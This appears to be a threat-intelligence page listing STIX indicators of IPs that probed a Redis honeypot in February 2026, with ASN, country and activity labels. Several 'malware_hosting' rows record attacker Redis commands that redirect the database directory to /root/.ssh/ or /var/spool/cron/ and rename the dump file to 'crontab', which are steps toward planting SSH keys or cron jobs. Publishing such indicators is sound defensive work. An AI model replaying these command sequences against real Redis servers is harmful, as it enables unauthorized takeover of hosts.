15. [fortinet.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH5-A4KvYnWzLBTmpcyLEpn_SGFXD3fbOMxQt71cswr1DiVz0tvZrR_nKgBohAfyu-exBqSHLftOpQlQ_WeJDV3khAeMHCgjU0M12P68M-jyf3l8XXx8leIFolL2zIM5ZOt4GlKlZhwVoNR8d0oxhW0ZRKXag98V3gOvFkUJGdN8_YWKD4DuBVUAA7zsTjR_uVQQRDu1FWL7xl_WS-OFVMDsLpL)
16. [wolfpackcybernetics.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGsiQVrSb_aalEl3CaExy4WAR5ZqBK8QiCRAI0fXAezim33Le9bk_aoTjuHLCjkByMp6uXCZsL67QOgn5fDxaf-AyD3TyJ9xm3Ao2TDFh3hrSGZzEJepVcEkk8cIq_1PDUIf0ppu0frItWkHj8S)
17. [any.run](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFdnIL2nE4ouC3a49sTlyf2Nel38JrahZdDiKKMmfvi5KT_JVgOsW1jftnhvrc5qpHMUJGLOeVKM9nFZ9gvUqfC7VQD32oPQPANkzdRK9oDClAvb-feyMCtcgnP-aUc2yN-docMB4j98gyXWG0Wl3BpVCd1vyIwTI6dxAUVSRp6mCDKz5frN0UN6MBjKJ1DZgpW5NZjH9dOsLKuTb6qyphJvdzADv9TWgR5idaq6aDBU7dz)
18. [any.run](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHIS36qjXn27DCN4bUry01zJy-nZ-R5Ym06j7Us_bGG1Hvbc_6sz_JJxtAflv0_xt_42KOJwbJpMD_5fuU-rKxFj2Fv5nCURq3b2kvjDht_YJD8b3m8517BZ2yMZOi9Xw-JR0kDKK3IqBuFjYPTARm0-LWmjli8RkxZ5HWicRaQpJBd2EtNpv1jBVrh86k0iN9M1kMwaZkUImpD05G66lrPny4Q6ky1uuTFGb6oCw792TZS)
19. [filescan.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFvDLXGg0sA5c_vbZN-tggskVbGGiayjWW0r6nvNXZTn_yYcHdEsad0_S0rG1g_xfeuak9AN58CsvySX9FDMpSz5-10cHhlwdSOf-dMq7OEBV7A3LJqiJdE8wxaKQusfmgiAp57wL4KOgPXw5NHjjUPVLkDGk57NJgZiI1TLd0VNaOqPl5rdIY5v0U-_L-xlhS4RMd68VlT-6DOQy1BaJLk-eyF9w==)
20. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHRBy-xoMFVI1JMjMGgjVHZIRYIiWyLVZ3iitmUnu_7t3zl3CihTlbYFS3ivwcWWmsCb_2fRoMi8f1LUCD8AXBphm5-3ESpKUhzXjc9cozkIWi70-v7j8FU5P_sBq8x)
21. [fortinet.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEkkwJnPlv3rjhFkLsACwRsTV1wIMhXkkK-aphMGS7kp3P_razPzXboXeqCJ7pDdDTDrc7Kzg42ox9qmLQLuhU-bQLj159ErnUFLDIWJqxOfmXrgD1Q1NCraMqukvE_3h9PgSzwefQD3PrE6M23Ah3qQmztDgEQny_7OJguJ2Lpoze1q4GFyDRgdXo5jX4UGlXJ5AnnQUtuxPMgYBBIXPiQGuQg9CK7)
STIX indicators
Filter, search, and copy indicators. Download the full STIX 2.1 bundle with GeoIP, ASN, threat scores, and MITRE ATT&CK mappings.
| Type | Value | Description | Labels | Valid from | |
|---|---|---|---|---|---|
| IPv4 | 185.242.226.44 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 159.65.221.237 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 52.159.229.145 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG SET dbfilename -ERR Unknown subcommand or wrong number of arguments for 'get'. Try CONFIG HELP.,CONFIG GET dir,CONFIG SET dir /var/spool/cron/,CONFIG SET dir -ERR Unknown subcommand or wrong number of arguments for 'get'. Try CONFIG HELP.,CONFIG SET dir /root/.ssh/; redis_cmd_hits=0; cmd="CONFIG SET dir -ERR Unknown subcommand or wrong number of arguments for 'get'. Try CONFIG HELP." | malware_hosting | 2026-02-01 | |
| IPv4 | 79.124.40.126 | Attacker IP • Redis / seen in Redishoneypot; events=1; ports=6379; cc=BG; asn=50360; asn_org=Tamatiya EOOD; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 125.67.236.54 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 14.18.118.84 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=58466; asn_org=CHINANET Guangdong province network; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 159.223.174.120 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 167.172.144.69 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 167.94.138.151 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 66.132.153.116 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 101.249.62.190 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 101.71.208.46 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 198.235.24.123 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 91.231.89.193 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 91.231.89.50 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 91.231.89.53 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 103.123.97.10 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=ID; asn=138074; asn_org=PT. Wowrack Cepat Teknologi Nusantara; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 135.237.125.143 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 185.242.226.12 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 146.190.241.67 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 46.161.50.108 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=RU; asn=34665; asn_org=Petersburg Internet Network ltd.; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.0; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 13.217.220.75 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 135.237.125.92 | Attacker IP • Redis / seen in Redishoneypot; events=24; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 182.40.103.253 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=136195; asn_org=Qingdao, Shandong Province, P.R.China.; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 125.94.106.113 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 3.134.148.59 | Attacker IP • Redis / seen in Redishoneypot; events=99; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="SSH-2.0-Go " | bruteforce | 2026-02-01 | |
| IPv4 | 218.78.131.154 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4812; asn_org=China Telecom Group; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 34.100.203.118 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=IN; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 97.74.92.144 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=26496; asn_org=GoDaddy.com, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 213.199.52.47 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 111.229.162.105 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 157.230.101.158 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 101.206.108.14 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 45.33.78.24 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 62.171.135.105 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 183.56.183.136 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 188.245.165.139 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=24940; asn_org=Hetzner Online GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 103.57.151.12 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=BD; asn=63984; asn_org=Nexdecade Technology Pvt. LTD; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 213.199.35.148 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 49.115.217.27 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 101.200.120.136 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 36.133.44.233 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 45.136.18.192 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 61.153.23.162 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 160.187.107.47 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=ID; asn=153119; asn_org=PT Intan Pariwara; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 185.224.128.16 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=NL; asn=49870; asn_org=Alsycon B.V.; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 84.235.244.26 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=AE; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 135.232.201.81 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG GET dbfilename,CONFIG SET dir /root/.ssh/,CONFIG SET dir /data,CONFIG GET dir,CONFIG SET dir /var/spool/cron/; redis_cmd_hits=0; cmd="CONFIG SET dir /data" | malware_hosting | 2026-02-01 | |
| IPv4 | 162.142.125.34 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 162.142.125.82 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 14.116.219.149 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=58466; asn_org=CHINANET Guangdong province network; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 34.230.221.101 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 84.247.137.164 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 9.169.195.91 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 185.242.226.3 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 20.168.127.123 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-01 | |
| IPv4 | 39.91.88.206 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 101.201.34.229 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 8.138.185.100 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-01 | |
| IPv4 | 39.107.95.100 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 52.176.124.227 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG SET dir /etc,CONFIG SET dir /root/.ssh/,CONFIG SET dir /var/spool/cron/,CONFIG SET dbfilename crontab,CONFIG GET dir; redis_cmd_hits=0; cmd="CONFIG SET dir /etc" | malware_hosting | 2026-02-02 | |
| IPv4 | 101.33.250.74 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 106.13.124.241 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 203.55.131.3 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=32475; asn_org=Internap Holding LLC; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 220.250.52.75 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 47.236.24.189 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=SG; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 52.23.197.250 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 80.237.96.189 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RU; asn=20485; asn_org=Joint Stock Company TransTeleCom; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 36.151.143.49 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=56046; asn_org=China Mobile communications corporation; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 205.210.31.238 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 3.141.190.56 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 120.24.174.153 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 140.246.124.160 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=58519; asn_org=Cloud Computing Corporation; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 118.121.27.103 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 155.212.222.212 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RU; asn=198610; asn_org=Beget LLC; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 8.140.150.7 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 130.107.177.232 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 172.202.117.221 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 4.255.23.245 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 65.49.1.222 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 65.49.1.227 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 116.255.217.226 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 175.178.24.123 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 185.130.47.197 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=NL; asn=210083; asn_org=Privex Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 64.20.44.213 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=19318; asn_org=Interserver, Inc; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 129.121.74.173 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 180.76.52.82 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 157.230.218.158 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode,Not Suspicious Traffic; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 20.253.66.52 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 220.248.173.137 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 81.70.2.239 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 115.190.97.5 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=137718; asn_org=Beijing Volcano Engine Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 183.56.219.190 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=135089; asn_org=China Telecom; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 47.97.229.80 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 143.198.113.180 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 180.149.32.80 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=25846; asn_org=Cloudnium LLC; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 193.163.125.141 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-02 | |
| IPv4 | 20.197.32.228 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=IN; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 45.91.64.6 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=RU; asn=214664; asn_org=JSC Buduschee; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 167.94.138.188 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-02 | |
| IPv4 | 140.245.70.130 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=KR; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-03 | |
| IPv4 | 45.149.76.252 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=IR; asn=60631; asn_org=Vandad Vira Hooman LLC; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 205.210.31.207 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-03 | |
| IPv4 | 185.242.226.20 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 48.214.53.90 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG SET dir /root/.ssh/,CONFIG SET dir /var/spool/cron/,CONFIG GET dbfilename,CONFIG SET dbfilename crontab,CONFIG GET dir; redis_cmd_hits=0; cmd="CONFIG SET dir /etc" | malware_hosting | 2026-02-03 | |
| IPv4 | 200.143.206.231 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=BR; asn=1916; asn_org=Rede Nacional de Ensino e Pesquisa; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 218.59.175.217 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 103.88.241.237 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RU; asn=9123; asn_org=Jsc timeweb; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 167.248.133.116 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 120.48.151.68 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 34.40.101.114 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 3.149.246.209 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 3.130.96.91 | Attacker IP • Redis / seen in Redishoneypot; events=86; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="SSH-2.0-Go " | bruteforce | 2026-02-03 | |
| IPv4 | 146.56.175.64 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=KR; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-03 | |
